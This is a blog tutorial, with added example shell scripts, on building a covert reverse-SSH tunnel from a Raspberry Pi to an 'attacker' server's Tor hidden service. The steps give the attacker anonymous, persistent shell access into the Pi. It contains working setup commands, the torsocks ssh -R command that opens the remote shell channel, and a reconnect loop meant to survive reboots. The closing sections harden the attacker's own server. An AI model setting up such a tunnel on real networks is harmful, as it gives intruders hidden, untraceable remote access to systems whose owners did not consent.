Tor Remote Reverse-SSH Tunnel

Last modified: 26 January 2022

How to expose an SSH server as a Tor hidden service, reach it from a client through an SSH remote tunnel, and then use the hidden service as an anonymous SSH proxy into that client.

We will set up a remote SSH tunnel from a Raspberry Pi client to a hidden service that the attacker can reach over Tor.

Prerequisites (example setup):

  • user pi on the Raspberry.
  • user lobs on the Attacker Server.
  • SSH server running on both.
  • TOR server running on both.
  • torsocks installed on raspi.

Torsocks allows you to use most applications in a safe way with Tor. It ensures that DNS requests are handled safely and explicitly rejects any traffic other than TCP from the application you’re using.

TOR Hidden Service setup

On the attacker machine you need to set up a hidden service, reachable from anywhere in the Tor network, that exposes the local SSH server. This is the endpoint the Raspberry will reverse-SSH into.

Edit the /etc/tor/torrc file and add (or uncomment) these lines:

HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 30022 127.0.0.1:22

where 30022 is the virtual port the service exposes to the Tor network; Tor delivers connections arriving on it to 127.0.0.1 port 22. The virtual port is not a real listening socket, so nothing has to be opened in the server's firewall for it.

To restrict who can even connect to the onion service, add client authorization. On current Tor (v3 onion services) this means putting a client's x25519 public key file into /var/lib/tor/hidden_service/authorized_clients/ on the server and pointing the Raspberry's Tor at the matching private key with the ClientOnionAuthDir directive. The older HiddenServiceAuthorizeClient directive only applies to v2 services, which Tor no longer supports.

Then save and restart Tor. On the first start it generates the service's key material in the hidden_service folder. The last thing you need is the hostname of the service, which Tor writes to /var/lib/tor/hidden_service/hostname.

For example: irpqznciwifhpqgd.onion

Note that this 16-character name is a v2 onion address. Since Tor 0.4.6 (mid-2021) only v3 services are created, whose names are 56 characters long; the commands below keep the name from the original post, so substitute the one your Tor wrote.
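The server-side setup above as a script, added here as an example and not part of the original post. It assumes a Debian-style Tor install (/etc/tor/torrc, a systemd unit named tor, the hostname file under /var/lib/tor/hidden_service) and that it runs as root; the directory and port values match the post, and the onion names used to check the validator are constructed strings, not real services.

```shell
#!/bin/sh
# Added example: install the onion service stanza, restart Tor and read back
# the v3 hostname. Assumes /etc/tor/torrc and a systemd unit called "tor".
set -eu

HS_DIR=/var/lib/tor/hidden_service
HS_VIRTPORT=30022          # port exposed inside the Tor network
HS_TARGET=127.0.0.1:22     # local sshd the onion service forwards to

# Print the torrc stanza for the service. HiddenServiceVersion 3 is the
# current default; it is stated explicitly so an old config cannot surprise you.
hs_torrc_stanza() {
    # $1: HiddenServiceDir, $2: virtual port, $3: target host:port
    printf 'HiddenServiceDir %s/\nHiddenServiceVersion 3\nHiddenServicePort %s %s\n' \
        "$1" "$2" "$3"
}

# A v3 onion hostname is 56 base32 characters (a-z, 2-7) followed by ".onion".
# 16-character names are v2, which Tor stopped serving in 0.4.6 (2021).
is_v3_onion() {
    printf '%s\n' "$1" | grep -Eq '^[a-z2-7]{56}\.onion$'
}

# Append the stanza if it is not already in torrc, restart Tor, then wait for
# the hostname file the daemon writes on its first start with the new config.
install_onion_service() {
    if ! grep -q "^HiddenServiceDir $HS_DIR/" /etc/tor/torrc; then
        hs_torrc_stanza "$HS_DIR" "$HS_VIRTPORT" "$HS_TARGET" >> /etc/tor/torrc
    fi
    systemctl restart tor
    i=0
    while [ ! -s "$HS_DIR/hostname" ]; do
        i=$((i + 1))
        if [ "$i" -ge 30 ]; then
            echo "tor did not create $HS_DIR/hostname" >&2
            return 1
        fi
        sleep 1
    done
    name=$(cat "$HS_DIR/hostname")
    if ! is_v3_onion "$name"; then
        echo "unexpected hostname format (old v2 service?): $name" >&2
        return 1
    fi
    echo "$name"
}

# Only act when invoked as "sh onion-setup.sh install"; sourcing the file
# just defines the functions.
if [ "${1:-}" = "install" ]; then
    install_onion_service
fi
```

Run it once as root with the install argument; the printed name is what goes into the Raspberry's ssh command in place of irpqznciwifhpqgd.onion.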

On the Raspberry, also edit /etc/tor/torsocks.conf and set the line:

AllowOutboundLocalhost 1

This is needed because torsocks refuses connections to the loopback interface by default, and the ssh client running under torsocks has to connect to localhost:22 on the Raspberry to serve every connection the server sends back through the reverse tunnel. Without it the tunnel comes up but every attempt to use it fails.

From the Raspberry:

  • If a key pair does not already exist, generate one:
    $ ssh-keygen
    
  • Copy the public key to the Server. Do this through Tor as well, so the Raspberry's real address never shows up in the server's logs:
    $ torsocks ssh-copy-id -i ~/.ssh/id_rsa.pub -p 30022 lobs@irpqznciwifhpqgd.onion
    
  • The command to launch is:
    $ torsocks ssh -p 30022 -N -R 2222:localhost:22 lobs@irpqznciwifhpqgd.onion
    

This uses torsocks to SSH from the Raspberry to the attacker's hidden service without running any remote command (-N), and asks the server to listen on its port 2222 and send every connection it receives there back through the tunnel to port 22 on the Raspberry (or whatever port your sshd uses).

After that, on the attacker server there is a listener on 127.0.0.1:2222 (sshd binds remote forwards to loopback unless GatewayPorts is enabled) that carries SSH traffic back over the Tor circuit to the Raspberry's port 22.

Every hop to the Raspberry rides inside its own Tor connection, so neither the port its sshd listens on (22 here) nor the hidden service's port 30022 ever crosses a firewall; both are local to the machines concerned. What a restrictive network on the Raspberry's side can block is Tor's own outbound connection to its guard relay. If only web ports are allowed out, tell Tor to use relays reachable on those ports (ReachableAddresses *:80,*:443 in torrc) or configure a bridge; moving sshd to port 80 or 443 does nothing for this.
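A client-side script for the Raspberry, added here as an example (not the original post's code), that checks the torsocks setting the tunnel depends on and keeps the reverse tunnel up across circuit failures. It assumes the user, port and onion name from the post (substitute your own v3 name), a torsocks config at /etc/tor/torsocks.conf, and that the server's host key was already recorded in known_hosts by the ssh-copy-id step; the torsocks.conf contents used to exercise the check are constructed.

```shell
#!/bin/sh
# Added example: keep the Raspberry's reverse tunnel alive. Values below are
# the ones from the post; ONION must be replaced with your own hostname.
set -eu

ONION=irpqznciwifhpqgd.onion   # attacker's onion hostname (assumed)
ONION_PORT=30022               # HiddenServicePort on the server
REMOTE_USER=lobs               # account on the attacker server
LISTEN_PORT=2222               # port opened on the server's loopback
LOCAL_SSH_PORT=22              # the Raspberry's own sshd
TORSOCKS_CONF=/etc/tor/torsocks.conf

# torsocks blocks connect() to 127.0.0.1 unless AllowOutboundLocalhost is 1
# (TCP) or 2 (TCP and UDP). The ssh client needs it to hand each forwarded
# connection to the local sshd, so refuse to start without it.
torsocks_allows_localhost() {
    # $1: path to torsocks.conf
    grep -Eq '^[[:space:]]*AllowOutboundLocalhost[[:space:]]+[12]' "$1"
}

# The -R argument as the post builds it: server port -> Raspberry sshd.
reverse_forward_spec() {
    printf '%s:localhost:%s\n' "$LISTEN_PORT" "$LOCAL_SSH_PORT"
}

# Reconnect forever. ExitOnForwardFailure makes ssh exit (instead of staying
# up uselessly) when port 2222 is already taken on the server; the keepalive
# options make it notice a dead Tor circuit instead of hanging indefinitely;
# StrictHostKeyChecking=yes pins the server to the key learnt at setup.
run_tunnel() {
    if ! torsocks_allows_localhost "$TORSOCKS_CONF"; then
        echo "set 'AllowOutboundLocalhost 1' in $TORSOCKS_CONF first" >&2
        return 1
    fi
    while :; do
        torsocks ssh -p "$ONION_PORT" -N \
            -o ExitOnForwardFailure=yes \
            -o ServerAliveInterval=60 -o ServerAliveCountMax=3 \
            -o StrictHostKeyChecking=yes \
            -R "$(reverse_forward_spec)" \
            "${REMOTE_USER}@${ONION}" || true
        # Tor circuits and onion descriptors take a while to rebuild; do not
        # hammer the service the moment the session drops.
        sleep 30
    done
}

# Only start the loop when invoked as "sh tunnel.sh run".
if [ "${1:-}" = "run" ]; then
    run_tunnel
fi
```

Start it under a process supervisor or a cron @reboot entry so the tunnel survives reboots; a pinned host key also means a swapped server is noticed rather than silently trusted.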

The Attacker

The attacker just needs to:

  1. SSH into his server on port 30022, through Tor, exactly as the Raspberry does.
  2. From that shell, connect to the forwarded port. Port 2222 ends at the Raspberry's sshd, so log in as the Raspberry's user (pi), not as lobs:
    $ ssh -p 2222 -l pi localhost
    
    

The attacker's connection to 127.0.0.1:2222 on the server is carried inside the SSH session the Raspberry opened, which itself runs over a Tor circuit to the hidden service; it is SSH inside SSH, ending at the Raspberry's sshd. The Raspberry only ever talks to its local Tor daemon, the server only ever sees connections arriving from its own Tor daemon, and the attacker reaches the server through Tor as well, so no party learns another's real address.

attacker <---> Tor <---> HiddenService <---> Tor <---> client

Considerations

This way, if the Raspberry falls into someone else's hands, its private key gives that person access to the attacker server as user lobs, and the onion hostname tells them where it is. Limit the damage up front: give the key an authorized_keys entry that only permits the port forward (OpenSSH's restrict and permitlisten options) so it cannot open a shell, and enable client authorization on the onion service. Once the Raspberry has served its purpose, remove its key from authorized_keys on the server or simply destroy the hidden service.
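Two server-side helpers for the considerations above, added here as an example and not the post's own code: one writes the restricted authorized_keys entry that lets the Raspberry's key open the reverse tunnel and nothing else, the other revokes the key afterwards. They assume OpenSSH 7.8 or later on the server (permitlisten) and an authorized_keys file at the path you pass; the key material used to exercise them is a constructed placeholder, not a real key.

```shell
#!/bin/sh
# Added example: restrict the Raspberry's key to the tunnel, then revoke it.
# Assumes OpenSSH >= 7.8 on the server for the permitlisten option.
set -eu

# Prefix a public key line with options so that the key can only open the
# reverse tunnel: "restrict" disables pty, X11, agent and all forwarding;
# "port-forwarding" re-enables forwarding; permitlisten pins the -R listen
# port, so the client cannot open other ports on the server. Since the
# client uses -N it never asks for a shell, and restrict would refuse one.
restrict_tunnel_key() {
    # $1: public key line ("ssh-ed25519 AAAA... comment"), $2: listen port
    printf 'restrict,port-forwarding,permitlisten="%s" %s\n' "$2" "$1"
}

# Append the restricted entry to an authorized_keys file.
authorize_tunnel_key() {
    # $1: authorized_keys path, $2: public key line, $3: listen port
    restrict_tunnel_key "$2" "$3" >> "$1"
    chmod 600 "$1"
}

# Drop every authorized_keys entry whose key blob matches the given public
# key. Matching on the base64 blob means options and comment do not matter,
# which is what you want when revoking a key you restricted earlier.
revoke_key() {
    # $1: authorized_keys path, $2: public key line
    blob=$(printf '%s\n' "$2" | awk '{print $2}')
    tmp=$(mktemp)
    # grep -v exits 1 when nothing is left; that is not an error here.
    grep -vF -- "$blob" "$1" > "$tmp" || true
    cat "$tmp" > "$1"      # rewrite in place, keeping ownership and mode
    rm -f "$tmp"
}

# Count how many entries still carry the given key blob (0 after revocation).
key_entries() {
    # $1: authorized_keys path, $2: public key line
    blob=$(printf '%s\n' "$2" | awk '{print $2}')
    grep -cF -- "$blob" "$1" || true
}
```

Use authorize_tunnel_key on ~lobs/.ssh/authorized_keys with the Raspberry's public key and 2222 instead of the plain ssh-copy-id step if you want the restriction from the start; revoke_key is the cleanup the post recommends once the Raspberry is done.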

Please feel free to make any comment! If anything is unclear, just write in the comments and I will update the post! Thanks for reading!